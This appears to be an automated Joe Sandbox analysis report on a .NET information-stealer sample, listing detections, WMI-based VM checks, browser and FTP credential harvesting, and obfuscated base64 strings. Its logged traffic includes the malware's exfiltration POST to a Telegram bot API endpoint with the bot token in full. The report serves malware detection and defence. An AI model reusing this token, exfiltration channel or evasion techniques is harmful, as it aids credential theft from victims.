Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545748
MD5:cae3f7ae06655eb93f5dfb028ddd3d6d
SHA1:54821b16fab00ec529f0b99e1d49de8d291eb492
SHA256:1fc74fb83aebbe5a37b41e7a4e900a83288618ca696d76a717e2d6a51fad343f
Tags:exeuser-Bitsight
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CAE3F7AE06655EB93F5DFB028DDD3D6D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
    Process Memory Space: file.exe PID: 7140JoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: file.exeReversingLabs: Detection: 65%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848EA3E02 CryptUnprotectData,0_2_00007FF848EA3E02
      Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Uses the Telegram API (likely for C&C communication)
      Source: unknownDNS query: name: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
      Source: Joe Sandbox ViewIP Address: 104.26.0.100 104.26.0.100
      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: POST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06aHost: api.telegram.orgContent-Length: 722595Expect: 100-continueConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: get.geojs.io
      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
      Source: unknownHTTP traffic detected: POST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06aHost: api.telegram.orgContent-Length: 722595Expect: 100-continueConnection: Keep-Alive
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
      Source: file.exe, 00000000.00000002.3890665414.000001E394E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geH
      Source: file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
      Source: file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
      Source: file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
      Source: file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
      Source: file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/freakcodingspot
      Source: file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
      Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848EAB57D0_2_00007FF848EAB57D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E95D120_2_00007FF848E95D12
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848EAE7B30_2_00007FF848EAE7B3
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E94F660_2_00007FF848E94F66
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E9CF1C0_2_00007FF848E9CF1C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E9E0F50_2_00007FF848E9E0F5
      Source: file.exe, 00000000.00000002.3890374736.000001E3932B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
      Source: file.exe, 00000000.00000000.2029423115.000001E393022000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs file.exe
      Source: file.exeBinary or memory string: OriginalFilenamesystem.exeH vs file.exe
      Source: file.exe, Ikiluluveno.csBase64 encoded string: 'PXR8MSpkUjpWWR8OW1IiAwBUEDI7fz9Zbl0cXAdpPhgBUlUHGhAlMXxmN09lRAEJC0JDPQ0QT1k='
      Source: file.exe, Xycohacykap.csBase64 encoded string: 'Jnp1LTZzJytrcTw7amM9LzxtYxsPRAUYS1EuOVRaGA8yYkQRCF0='
      Source: file.exe, Idixymovoxu.csBase64 encoded string: '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'
      Source: file.exe, Gasacucyzuh.csBase64 encoded string: 'IERdFgxCSFlCBA9iP2YCCw1UWBsFVBcLAxQJXkg7ZC8WQVkGCEQbFlcOUhQHS0ERXUw9fitCHQ5KUQBVFU1aF05HS0EUEFoCD0lb'
      Source: file.exe, Ykokoninaco.csBase64 encoded string: 'PXR8MSpkUlMZciAgeBY5AwACAis5Qh0aXEcBT2J+KzgrEWAGBlMXCkp9Fk8IFhVaEw=='
      Source: file.exe, Odaponagyte.csBase64 encoded string: 'I15KHQVcE1YMGkJPHWEHBApeRwdJfiZZDxpDVBVhIT1YBRlUKEACFVxjFw1+XxpFWAECWloHUlFyfCYieRpOBgdaVVQuVRESVh1SLF1EAQcLHgRNRwBcSA0GQEEGD1dKPVBWFRtZXU8JBA=='
      Source: file.exe, Avurudimyny.csBase64 encoded string: 'QxxHHQdUHQ4URB0cXEIHBQAMHUZdAEJVFAZGXwUWQ0ccVF0bHVVfHVxWBwhSXwANQ0FfBh0NS0sLBlJCGEYcBQhYXBFEVBsLXFcGAEdPU0g='
      Source: file.exe, Afozotodocu.csBase64 encoded string: 'WAMBQ1AISkgAB0gudHAHIBlVUzIhdAc6dARKCXR3MQ4Ac2EuLnw2KWpiGDpkbw==', 'Ug5IGQUQBBxLRxsAWwtMW0ABElRWDn9zBWYhLmVXHAsDVEQRG0NSAVRYHBwPTh0DUxNYAB1ASFYWQwUYG0FdRAFDV1tbAEJIFmw/I2ZVBg8DUB0dB0MGGFdXF00VTgMGAEIKDBpUT1tRQAYfDxlBHRlGHgNaHh0LXhtAXwUHQTIjfWMXAVUfGBsKf2UVFlIvFkFfGgxeBkd4ZTMtCRkrEh5eXhEHREx0MxRSU3hZCh8CRENKWGkYHFdOMxdgBQMNJmJIDkJoJBV1cV0tR3wiAVhGakYvACdITHg3Ggx8WhtFc3YOCl03CVVeFTVdVDpfPwl7TBNfQgtdYxAKd3koLhcFBj8+AjQfcnVBLVdDRQsheGIDRkk0AAtcFgx4TzYfQV1/FQIAADpVYUpbAHdFKRh4BDgYXRdWb1UTXlxPJwVaXFRAX2AzFGpnITZvWz8wLX8fJxwIWUAJf0tWBngFV1IefRsNRR4MSgp/ZQkZPDkvYVEGCF0XDVxGAVE='
      Source: file.exe, Xyxecemojim.csBase64 encoded string: 'O0FXBghUF0MZQxcNRlkNAQtFPX4qXxwXXFcGBlpYVEo7QVcGCFQXdDNnFwwYYQsIPV5THwxEXzJcTUhPUXEGBid5fhwLaDAKY2cwGlcEWwA0YA1JZDohHFoZJQpXZQEJBVREWT9VAApQWxxVFQddZ2Q8Og=='
      Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@1/1@2/2
      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
      Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\Icyfydotatacymefytuvemukylihibe
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6464
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5600
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3008
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6960
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4268
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2972
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3396
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2964
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6096
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3380
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2516
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2940
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5508
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1656
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 760
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5500
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4396
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4196
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3332
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5052
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4616
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2448
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3452
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3724
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
